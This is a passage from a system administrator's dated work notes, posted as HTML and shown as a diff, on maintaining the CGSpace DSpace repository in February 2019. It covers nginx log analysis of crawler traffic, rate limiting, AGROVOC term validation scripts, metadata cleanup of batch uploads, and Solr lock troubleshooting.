+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
+186
+</code></pre><ul>
+<li>94.71.244.172 is in Greece and uses the user agent &ldquo;Indy Library&rdquo;</li>
+<li>At least they are re-using their Tomcat session:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=94.71.244.172&#39; dspace.log.2019-02-18 | sort | uniq | wc -l
+</code></pre><ul>
+<li>
+<p>The following IPs were all hitting the server hard simultaneously and are located on Amazon and use the user agent &ldquo;Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0&rdquo;:</p>
+<ul>
+<li>52.54.252.47</li>
+<li>34.230.15.139</li>
+<li>100.24.48.177</li>
+<li>3.84.172.18</li>
+<li>3.80.196.188</li>
+<li>3.83.14.11</li>
+<li>54.164.83.99</li>
+<li>18.212.208.240</li>
+</ul>
+</li>
+<li>
+<p>Actually, even up to the top 30 IPs are almost all on Amazon and use the same user agent!</p>
+</li>
+<li>
+<p>For reference most of these IPs hitting the XMLUI this afternoon are on Amazon:</p>
+</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 30
+   1173 52.91.249.23
+   1176 107.22.118.106
+   1178 3.88.173.152
+   1179 3.81.136.184
+   1183 34.201.220.164
+   1183 3.89.134.93
+   1184 54.162.66.53
+   1187 3.84.62.209
+   1188 3.87.4.140
+   1189 54.158.27.198
+   1190 54.209.39.13
+   1192 54.82.238.223
+   1208 3.82.232.144
+   1209 3.80.128.247
+   1214 54.167.64.164
+   1219 3.91.17.126
+   1220 34.201.108.226
+   1221 3.84.223.134
+   1222 18.206.155.14
+   1231 54.210.125.13
+   1236 18.212.208.240
+   1276 54.164.83.99
+   1277 3.83.14.11
+   1282 3.80.196.188
+   1296 3.84.172.18
+   1299 100.24.48.177
+   1299 34.230.15.139
+   1327 52.54.252.47
+   1477 5.9.6.51
+   1861 94.71.244.172
+</code></pre><ul>
+<li>In the case of 52.54.252.47 they are only making about 10 requests per minute during this time (albeit from dozens of concurrent IPs):</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep 52.54.252.47 | grep -o -E &#39;18/Feb/2019:1[0-9]:[0-9][0-9]&#39; | uniq -c | sort -n | tail -n 10
+     10 18/Feb/2019:17:20
+     10 18/Feb/2019:17:22
+     10 18/Feb/2019:17:31
+     11 18/Feb/2019:13:21
+     11 18/Feb/2019:15:18
+     11 18/Feb/2019:16:43
+     11 18/Feb/2019:16:57
+     11 18/Feb/2019:16:58
+     11 18/Feb/2019:18:34
+     12 18/Feb/2019:14:37
+</code></pre><ul>
+<li>As this user agent is not recognized as a bot by DSpace this will definitely fuck up the usage statistics</li>
+<li>There were 92,000 requests from these IPs alone today!</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -c &#39;Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0&#39;
+92756
+</code></pre><ul>
+<li>I will add this user agent to the <a href="https://github.com/ilri/rmg-ansible-public/blob/master/roles/dspace/templates/nginx/default.conf.j2">&ldquo;badbots&rdquo; rate limiting in our nginx configuration</a></li>
+<li>I realized that I had effectively only been applying the &ldquo;badbots&rdquo; rate limiting to requests at the root, so I added it to the other blocks that match Discovery, Browse, etc as well</li>
+<li>IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary</li>
+<li>I will merge them with our existing list and then resolve their names using my <code>resolve-orcids.py</code> script:</li>
+</ul>
+<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml 2019-02-18-IWMI-ORCID-IDs.txt  | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2019-02-18-combined-orcids.txt
+$ ./resolve-orcids.py -i /tmp/2019-02-18-combined-orcids.txt -o /tmp/2019-02-18-combined-names.txt -d
+# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+</code></pre><ul>
+<li>I merged the changes to the <code>5_x-prod</code> branch and they will go live the next time we re-deploy CGSpace (<a href="https://github.com/ilri/DSpace/pull/412">#412</a>)</li>
+</ul>
+<h2 id="2019-02-19">2019-02-19</h2>
+<ul>
+<li>Linode sent another alert about CPU usage on CGSpace (linode18) averaging 417% this morning</li>
+<li>Unfortunately, I don&rsquo;t see any strange activity in the web server API or XMLUI logs at that time in particular</li>
+<li>So far today the top ten IPs in the XMLUI logs are:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;19/Feb/2019:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+  11541 18.212.208.240
+  11560 3.81.136.184
+  11562 3.88.237.84
+  11569 34.230.15.139
+  11572 3.80.128.247
+  11573 3.91.17.126
+  11586 54.82.89.217
+  11610 54.209.39.13
+  11657 54.175.90.13
+  14686 143.233.242.130
+</code></pre><ul>
+<li>143.233.242.130 is in Greece and using the user agent &ldquo;Indy Library&rdquo;, like the top IP yesterday (94.71.244.172)</li>
+<li>That user agent is in our Tomcat list of crawlers so at least its resource usage is controlled by forcing it to use a single Tomcat session, but I don&rsquo;t know if DSpace recognizes if this is a bot or not, so the logs are probably skewed because of this</li>
+<li>The user is requesting only things like <code>/handle/10568/56199?show=full</code> so it&rsquo;s nothing malicious, only annoying</li>
+<li>Otherwise there are still shit loads of IPs from Amazon still hammering the server, though I see HTTP 503 errors now after yesterday&rsquo;s nginx rate limiting updates
+<ul>
+<li>I should really try to script something around <a href="https://ipapi.co/api/">ipapi.co</a> to get these quickly and easily</li>
+</ul>
+</li>
+<li>The top requests in the API logs today are:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;19/Feb/2019:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     42 66.249.66.221
+     44 156.156.81.215
+     55 3.85.54.129
+     76 66.249.66.219
+     87 34.209.213.122
+   1550 34.218.226.147
+   2127 50.116.102.77
+   4684 205.186.128.185
+  11429 45.5.186.2
+  12360 2a01:7e00::f03c:91ff:fe0a:d645
+</code></pre><ul>
+<li><code>2a01:7e00::f03c:91ff:fe0a:d645</code> is on Linode, and I can see from the XMLUI access logs that it is Drupal, so I assume it is part of the new ILRI website harvester&hellip;</li>
+<li>Jesus, Linode just sent another alert as we speak that the load on CGSpace (linode18) has been at 450% the last two hours! I&rsquo;m so fucking sick of this</li>
+<li>Our usage stats have exploded the last few months:</li>
+</ul>
+<p><img src="/cgspace-notes/2019/02/usage-stats.png" alt="Usage stats"></p>
+<ul>
+<li>I need to follow up with the DSpace developers and Atmire to see how they classify which requests are bots so we can try to estimate the impact caused by these users and perhaps try to update the list to make the stats more accurate</li>
+<li>I found one IP address in Nigeria that has an Android user agent and has requested a bitstream from <a href="https://hdl.handle.net/10568/96140">10568/96140</a> almost 200 times:</li>
+</ul>
+<pre tabindex="0"><code># grep 41.190.30.105 /var/log/nginx/access.log | grep -c &#39;acgg_progress_report.pdf&#39;
+185
+</code></pre><ul>
+<li>Wow, and another IP in Nigeria made a bunch more yesterday from the same user agent:</li>
+</ul>
+<pre tabindex="0"><code># grep 41.190.3.229 /var/log/nginx/access.log.1 | grep -c &#39;acgg_progress_report.pdf&#39;
+346
+</code></pre><ul>
+<li>In the last two days alone there were 1,000 requests for this PDF, mostly from Nigeria!</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep acgg_progress_report.pdf | grep -v &#39;upstream response is buffered&#39; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
+      1 139.162.146.60
+      1 157.55.39.159
+      1 196.188.127.94
+      1 196.190.127.16
+      1 197.183.33.222
+      1 66.249.66.221
+      2 104.237.146.139
+      2 175.158.209.61
+      2 196.190.63.120
+      2 196.191.127.118
+      2 213.55.99.121
+      2 82.145.223.103
+      3 197.250.96.248
+      4 196.191.127.125
+      4 197.156.77.24
+      5 105.112.75.237
+    185 41.190.30.105
+    346 41.190.3.229
+    503 41.190.31.73
+</code></pre><ul>
+<li>That is so weird, they are all using this Android user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Linux; Android 7.0; TECNO Camon CX Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
+</code></pre><ul>
+<li>I wrote a quick and dirty Python script called <code>resolve-addresses.py</code> to resolve IP addresses to their owning organization&rsquo;s name, ASN, and country using the <a href="https://ipapi.co">IPAPI.co API</a></li>
+</ul>
+<h2 id="2019-02-20">2019-02-20</h2>
+<ul>
+<li>Ben Hack was asking about getting authors publications programmatically from CGSpace for the new ILRI website</li>
+<li>I told him that they should probably try to use the REST API&rsquo;s <code>find-by-metadata-field</code> endpoint</li>
+<li>The annoying thing is that you have to match the text language attribute of the field exactly, but it does work:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: &#34;&#34;}&#39;
+$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: null}&#39;
+$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: &#34;en_US&#34;}&#39;
+</code></pre><ul>
+<li>This returns six items for me, which is the <a href="https://cgspace.cgiar.org/discover?filtertype_1=orcid&amp;filter_relational_operator_1=contains&amp;filter_1=Alan+S.+Orth%3A+0000-0002-1735-7458&amp;submit_apply_filter=&amp;query=">same I see in a Discovery search</a></li>
+<li>Hector Tobon from CIAT asked if it was possible to get item statistics from CGSpace so I told him to use my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a></li>
+<li>I was playing with <a href="http://yasgui.org/">YasGUI</a> to query AGROVOC&rsquo;s SPARQL endpoint, but they must have a cached version or something because I get an HTTP 404 if I try to go to the endpoint manually</li>
+<li>I think I want to stick to the regular <a href="http://aims.fao.org/agrovoc/webservices">web services</a> to validate AGROVOC terms</li>
+</ul>
+<p><img src="/cgspace-notes/2019/02/yasgui-agrovoc.png" alt="YasGUI querying AGROVOC"></p>
+<ul>
+<li>There seems to be a REST API for AGROVOC here: <a href="http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=FISH&amp;lang=en">http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=FISH&amp;lang=en</a></li>
+<li>See this <a href="https://jira.duraspace.org/browse/VIVO-1655">issue on the VIVO tracker</a> for more information about this endpoint</li>
+<li>The old-school AGROVOC SOAP WSDL works with the <a href="https://python-zeep.readthedocs.io/en/master/">Zeep Python library</a>, but in my tests the results are way too broad despite trying to use a &ldquo;exact match&rdquo; searching</li>
+</ul>
+<h2 id="2019-02-21">2019-02-21</h2>
+<ul>
+<li>I wrote a script <a href="https://github.com/ilri/DSpace/blob/5_x-prod/agrovoc-lookup.py">agrovoc-lookup.py</a> to resolve subject terms against the public AGROVOC REST API</li>
+<li>It allows specifying the language the term should be queried in as well as output files to save the matched and unmatched terms to</li>
+<li>I ran our top 1500 subjects through English, Spanish, and French and saved the matched and unmatched terms to separate files:</li>
+</ul>
+<pre tabindex="0"><code>$ ./agrovoc-lookup.py -l en -i /tmp/top-1500-subjects.txt -om /tmp/matched-subjects-en.txt -or /tmp/rejected-subjects-en.txt
+$ ./agrovoc-lookup.py -l es -i /tmp/top-1500-subjects.txt -om /tmp/matched-subjects-es.txt -or /tmp/rejected-subjects-es.txt
+$ ./agrovoc-lookup.py -l fr -i /tmp/top-1500-subjects.txt -om /tmp/matched-subjects-fr.txt -or /tmp/rejected-subjects-fr.txt
+</code></pre><ul>
+<li>Then I generated a list of all the unique matched terms:</li>
+</ul>
+<pre tabindex="0"><code>$ cat /tmp/matched-subjects-* | sort | uniq &gt; /tmp/2019-02-21-matched-subjects.txt
+</code></pre><ul>
+<li>And then a list of all the unique <em>unmatched</em> terms using some utility I&rsquo;ve never heard of before called <code>comm</code> or with <code>diff</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ sort /tmp/top-1500-subjects.txt &gt; /tmp/subjects-sorted.txt
+$ comm -13 /tmp/2019-02-21-matched-subjects.txt /tmp/subjects-sorted.txt &gt; /tmp/2019-02-21-unmatched-subjects.txt
+$ diff --new-line-format=&#34;&#34; --unchanged-line-format=&#34;&#34; /tmp/subjects-sorted.txt /tmp/2019-02-21-matched-subjects.txt &gt; /tmp/2019-02-21-unmatched-subjects.txt
+</code></pre><ul>
+<li>Generate a list of countries and regions from CGSpace for Sisay to look through:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 228 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/2019-02-21-countries.csv WITH CSV HEADER;
+COPY 202
+dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 227 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/2019-02-21-regions.csv WITH CSV HEADER;
+COPY 33
+</code></pre><ul>
+<li>I did a bit more work on the IITA research theme (adding it to Discovery search filters) and it&rsquo;s almost ready so I created a pull request (<a href="https://github.com/ilri/DSpace/pull/413">#413</a>)</li>
+<li>I still need to test the batch tagging of IITA items with themes based on their IITA subjects:
+<ul>
+<li>NATURAL RESOURCE MANAGEMENT research theme to items with NATURAL RESOURCE MANAGEMENT subject</li>
+<li>BIOTECH &amp; PLANT BREEDING research theme to items with PLANT BREEDING subject</li>
+<li>SOCIAL SCIENCE &amp; AGRIBUSINESS research theme to items with AGRIBUSINESS subject</li>
+<li>PLANT PRODUCTION &amp; HEALTH research theme to items with PLANT PRODUCTION subject</li>
+<li>PLANT PRODUCTION &amp; HEALTH research theme to items with PLANT HEALTH subject</li>
+<li>NUTRITION &amp; HUMAN HEALTH research theme to items with NUTRITION subject</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-02-22">2019-02-22</h2>
+<ul>
+<li>
+<p>Help Udana from WLE with some issues related to CGSpace items on their <a href="https://www.wle.cgiar.org/publications">Publications website</a></p>
+<ul>
+<li>He wanted some IWMI items to show up in their publications website</li>
+<li>The items were mapped into WLE collections, but still weren&rsquo;t showing up on the publications website</li>
+<li>I told him that he needs to add the <code>cg.identifier.wletheme</code> to the items so that the website indexer finds them</li>
+<li>A few days ago he added the metadata to <a href="https://cgspace.cgiar.org/handle/10568/93011">10568/93011</a> and now I see that the item is present on the <a href="https://www.wle.cgiar.org/resource-recovery-waste-business-models-energy-nutrient-and-water-reuse-low-and-middle-income">WLE publications website</a></li>
+</ul>
+</li>
+<li>
+<p>Start looking at IITA&rsquo;s latest round of batch uploads called <a href="https://dspacetest.cgiar.org/handle/10568/108684">&ldquo;IITA_Feb_14&rdquo; on DSpace Test</a></p>
+<ul>
+<li>One mispelled authorship type</li>
+<li>A few dozen incorrect inconsistent affiliations (I dumped a list of the top 1500 affiliations and reconciled against it, but it was still a lot of work)</li>
+<li>One issue with smart quotes in countries</li>
+<li>A few IITA subjects with syntax errors</li>
+<li>Some whitespace and consistency issues in sponsorships</li>
+<li>Eight items with invalid ISBN: 0-471-98560-3</li>
+<li>Two incorrectly formatted ISSNs</li>
+<li>Lots of incorrect values in subjects, but that&rsquo;s a difficult problem to do in an automated way</li>
+</ul>
+</li>
+<li>
+<p>I figured out how to query AGROVOC from OpenRefine using Jython by creating a custom text facet:</p>
+</li>
+</ul>
+<pre tabindex="0"><code>import json
+import re
+import urllib
+import urllib2
+
+pattern = re.compile(&#39;^S[A-Z ]+$&#39;)
+if pattern.match(value):
+  url = &#39;http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=&#39; + urllib.quote_plus(value) + &#39;&amp;lang=en&#39;
+  get = urllib2.urlopen(url)
+  data = json.load(get)
+  if len(data[&#39;results&#39;]) == 1:
+    return &#34;matched&#34;
+
+return &#34;unmatched&#34;
+</code></pre><ul>
+<li>You have to make sure to URL encode the value with <code>quote_plus()</code> and it totally works, but it seems to refresh the facets (and therefore re-query everything) when you select a facet so that makes it basically unusable</li>
+<li>There is a <a href="https://programminghistorian.org/en/lessons/fetch-and-parse-data-with-openrefine#example-2-url-queries-and-parsing-json">good resource discussing OpenRefine, Jython, and web scraping</a></li>
+</ul>
+<h2 id="2019-02-24">2019-02-24</h2>
+<ul>
+<li>I decided to try to validate the AGROVOC subjects in IITA&rsquo;s recent batch upload by dumping all their terms, checking them in en/es/fr with <code>agrovoc-lookup.py</code>, then reconciling against the final list using reconcile-csv with OpenRefine</li>
+<li>I&rsquo;m not sure how to deal with terms like &ldquo;CORN&rdquo; that are alternative labels (<code>altLabel</code>) in AGROVOC where the preferred label (<code>prefLabel</code>) would be &ldquo;MAIZE&rdquo;</li>
+<li>For example, <a href="http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=CORN*&amp;lang=en">a query</a> for <code>CORN*</code> returns:</li>
+</ul>
+<pre tabindex="0"><code>    &#34;results&#34;: [
+        {
+            &#34;altLabel&#34;: &#34;corn (maize)&#34;,
+            &#34;lang&#34;: &#34;en&#34;,
+            &#34;prefLabel&#34;: &#34;maize&#34;,
+            &#34;type&#34;: [
+                &#34;skos:Concept&#34;
+            ],
+            &#34;uri&#34;: &#34;http://aims.fao.org/aos/agrovoc/c_12332&#34;,
+            &#34;vocab&#34;: &#34;agrovoc&#34;
+        },
+</code></pre><ul>
+<li>There are dozens of other entries like &ldquo;corn (soft wheat)&rdquo;, &ldquo;corn (zea)&rdquo;, &ldquo;corn bran&rdquo;, &ldquo;Cornales&rdquo;, etc that could potentially match and to determine if they are related programatically is difficult</li>
+<li>Shit, and then there are terms like &ldquo;GENETIC DIVERSITY&rdquo; that should <a href="http://agrovoc.uniroma2.it/agrovoc/agrovoc/en/page/c_33952">technically be</a> &ldquo;genetic diversity (as resource)&rdquo;</li>
+<li>I applied all changes to the IITA Feb 14 batch data except the affiliations and sponsorships because I think I made some mistakes with the copying of reconciled values so I will try to look at those again separately</li>
+<li>I went back and re-did the affiliations and sponsorships and then applied them on the IITA Feb 14 collection on DSpace Test</li>
+<li>I did a duplicate check of the IITA Feb 14 records on DSpace Test and there were about fifteen or twenty items reported
+<ul>
+<li>A few of them are actually in previous IITA batch updates, which means they have been uploaded to CGSpace yet, so I worry that there would be many more</li>
+<li>I want to re-synchronize CGSpace to DSpace Test to make sure that the duplicate checking is accurate, but I&rsquo;m not sure I can because the Earlham guys are still testing COPO actively on DSpace Test</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-02-25">2019-02-25</h2>
+<ul>
+<li>There seems to be something going on with Solr on CGSpace (linode18) because statistics on communities and collections are blank for January and February this year</li>
+<li>I see some errors started recently in Solr (yesterday):</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c ERROR /home/cgspace.cgiar.org/log/solr.log.2019-02-*
+/home/cgspace.cgiar.org/log/solr.log.2019-02-11.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-12.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-13.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-14.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-15.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-16.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-17.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-18.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-19.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-20.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-21.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-22.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-23.xz:0
+/home/cgspace.cgiar.org/log/solr.log.2019-02-24:34
+</code></pre><ul>
+<li>But I don&rsquo;t see anything interesting in yesterday&rsquo;s Solr log&hellip;</li>
+<li>I see this in the Tomcat 7 logs yesterday:</li>
+</ul>
+<pre tabindex="0"><code>Feb 25 21:09:29 linode18 tomcat7[1015]: Error while updating
+Feb 25 21:09:29 linode18 tomcat7[1015]: java.lang.UnsupportedOperationException: Multiple update components target the same field:solr_update_time_stamp
+Feb 25 21:09:29 linode18 tomcat7[1015]:         at org.dspace.statistics.SolrLogger$9.visit(SourceFile:1241)
+Feb 25 21:09:29 linode18 tomcat7[1015]:         at org.dspace.statistics.SolrLogger.visitEachStatisticShard(SourceFile:268)
+Feb 25 21:09:29 linode18 tomcat7[1015]:         at org.dspace.statistics.SolrLogger.update(SourceFile:1225)
+Feb 25 21:09:29 linode18 tomcat7[1015]:         at org.dspace.statistics.SolrLogger.update(SourceFile:1220)
+Feb 25 21:09:29 linode18 tomcat7[1015]:         at org.dspace.statistics.StatisticsLoggingConsumer.consume(SourceFile:103)
+...
+</code></pre><ul>
+<li>In the Solr admin GUI I see we have the following error: &ldquo;statistics-2011: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher&rdquo;</li>
+<li>I restarted Tomcat and upon startup I see lots of errors in the systemd journal, like:</li>
+</ul>
+<pre tabindex="0"><code>Feb 25 21:37:49 linode18 tomcat7[28363]: SEVERE: IOException while loading persisted sessions: java.io.StreamCorruptedException: invalid type code: 00
+Feb 25 21:37:49 linode18 tomcat7[28363]: java.io.StreamCorruptedException: invalid type code: 00
+Feb 25 21:37:49 linode18 tomcat7[28363]:         at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1601)
+Feb 25 21:37:49 linode18 tomcat7[28363]:         at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:2287)
+Feb 25 21:37:49 linode18 tomcat7[28363]:         at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:561)
+Feb 25 21:37:49 linode18 tomcat7[28363]:         at java.lang.Throwable.readObject(Throwable.java:914)
+Feb 25 21:37:49 linode18 tomcat7[28363]:         at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+Feb 25 21:37:49 linode18 tomcat7[28363]:         at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+</code></pre><ul>
+<li>I don&rsquo;t think that&rsquo;s related&hellip;</li>
+<li>Also, now the Solr admin UI says &ldquo;statistics-2015: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher&rdquo;</li>
+<li>In the Solr log I see:</li>
+</ul>
+<pre tabindex="0"><code>2019-02-25 21:38:14,246 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2015]: Error opening new searcher
+org.apache.solr.common.SolrException: Error opening new searcher
+        at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:873)
+        at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:646)
+...
+Caused by: org.apache.solr.common.SolrException: Error opening new searcher
+        at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1565)
+        at org.apache.solr.core.SolrCore.getSearcher(SolrCore.java:1677)
+        at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:845)
+        ... 31 more
+Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock
+        at org.apache.lucene.store.Lock.obtain(Lock.java:89)
+        at org.apache.lucene.index.IndexWriter.&lt;init&gt;(IndexWriter.java:753)
+        at org.apache.solr.update.SolrIndexWriter.&lt;init&gt;(SolrIndexWriter.java:77)
+        at org.apache.solr.update.SolrIndexWriter.create(SolrIndexWriter.java:64)
+        at org.apache.solr.update.DefaultSolrCoreState.createMainIndexWriter(DefaultSolrCoreState.java:279)
+        at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
+        at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
+        ... 33 more
+2019-02-25 21:38:14,250 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2015&#39;: Unable to create core [statistics-2015] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock
+</code></pre><ul>
+<li>I tried to shutdown Tomcat and remove the locks:</li>
+</ul>
+<pre tabindex="0"><code># systemctl stop tomcat7
+# find /home/cgspace.cgiar.org/solr -iname &#34;*.lock&#34; -delete
+# systemctl start tomcat7
+</code></pre><ul>
+<li>&hellip; but the problem still occurs</li>
+<li>I can see that there are still hits being recorded for items (in the Solr admin UI as well as my statistics API), so the main stats core is working at least!</li>
+<li>On a hunch I tried adding <code>ulimit -v unlimited</code> to the Tomcat <code>catalina.sh</code> and now Solr starts up with no core errors and I actually have statistics for January and February on <a href="https://cgspace.cgiar.org/handle/10568/16814">some communities</a>, but not <a href="https://cgspace.cgiar.org/handle/10568/1">others</a></li>
+<li>I wonder if the address space limits that I added via <code>LimitAS=infinity</code> in the systemd service are somehow not working?</li>
+<li>I did some tests with calling a shell script from systemd on DSpace Test (linode19) and the <code>LimitAS</code> setting does work, and the <code>infinity</code> setting in systemd does get translated to &ldquo;unlimited&rdquo; on the service</li>
+<li>I thought it might be open file limit, but it seems we&rsquo;re nowhere near the current limit of 16384:</li>
+</ul>
+<pre tabindex="0"><code># lsof -u dspace | wc -l
+3016
+</code></pre><ul>
+<li>For what it&rsquo;s worth I see the same errors about <code>solr_update_time_stamp</code> on DSpace Test (linode19)</li>
+<li>Update DSpace Test to <a href="https://tomcat.apache.org/tomcat-7.0-doc/changelog.html#Tomcat_7.0.93_(violetagg)">Tomcat 7.0.93</a></li>
+<li>Something seems to have happened (some Atmire scheduled task, perhaps the CUA one at 7AM?) on CGSpace because I checked a few communities and collections on CGSpace and there are now statistics for January and February</li>
+</ul>
+<p><img src="/cgspace-notes/2019/02/statlets-working.png" alt="CGSpace statlets working again"></p>
+<ul>
+<li>I still have not figured out what the <em>real</em> cause for the Solr cores to not load was, though</li>
+</ul>
+<h2 id="2019-02-26">2019-02-26</h2>
+<ul>
+<li>I sent a mail to the dspace-tech mailing list about the &ldquo;solr_update_time_stamp&rdquo; error</li>
+<li>A CCAFS user sent a message saying they got this error when submitting to CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:1021 by user 3049
+</code></pre><ul>
+<li>According to the <a href="https://cgspace.cgiar.org/rest/collections/1021">REST API</a> collection 1021 appears to be <a href="https://cgspace.cgiar.org/handle/10568/66581">CCAFS Tools, Maps, Datasets and Models</a></li>
+<li>I looked at the <code>WORKFLOW_STEP_1</code> (Accept/Reject) and the group is of course empty</li>
+<li>As we&rsquo;ve seen several times recently, we are not using this step so it should simply be deleted</li>
+</ul>
+<h2 id="2019-02-27">2019-02-27</h2>
+<ul>
+<li>Discuss batch uploads with Sisay</li>
+<li>He&rsquo;s trying to upload some CTA records, but it&rsquo;s not possible to do collection mapping when using the web UI
+<ul>
+<li>I sent a mail to the dspace-tech mailing list to ask about the inability to perform mappings when uploading via the XMLUI batch upload</li>
+</ul>
+</li>
+<li>He asked me to upload the files for him via the command line, but the file he referenced (<code>Thumbnails_feb_2019.zip</code>) doesn&rsquo;t exist</li>
+<li>I noticed that the command line batch import functionality is a bit weird when using zip files because you have to specify the directory where the zip file is location as well as the zip file&rsquo;s name:</li>
+</ul>
+<pre tabindex="0"><code>$ ~/dspace/bin/dspace import -a -e aorth@stfu.com -m mapfile -s /home/aorth/Downloads/2019-02-27-test/ -z SimpleArchiveFormat.zip
+</code></pre><ul>
+<li>Why don&rsquo;t they just derive the directory from the path to the zip file?</li>
+<li>Working on Udana&rsquo;s Restoring Degraded Landscapes (RDL) WLE records that we originally started in 2018-11 and fixing many of the same problems that I originally did then
+<ul>
+<li>I also added a few regions because they are obvious for the countries</li>
+<li>Also I added some rights fields that I noticed were easily available from the publications pages</li>
+<li>I imported the records into my local environment with a fresh snapshot of the CGSpace database and ran the Atmire duplicate checker against them and it didn&rsquo;t find any</li>
+<li>I uploaded fifty-two records to the <a href="https://cgspace.cgiar.org/handle/10568/81592">Restoring Degraded Landscapes collection</a> on CGSpace</li>
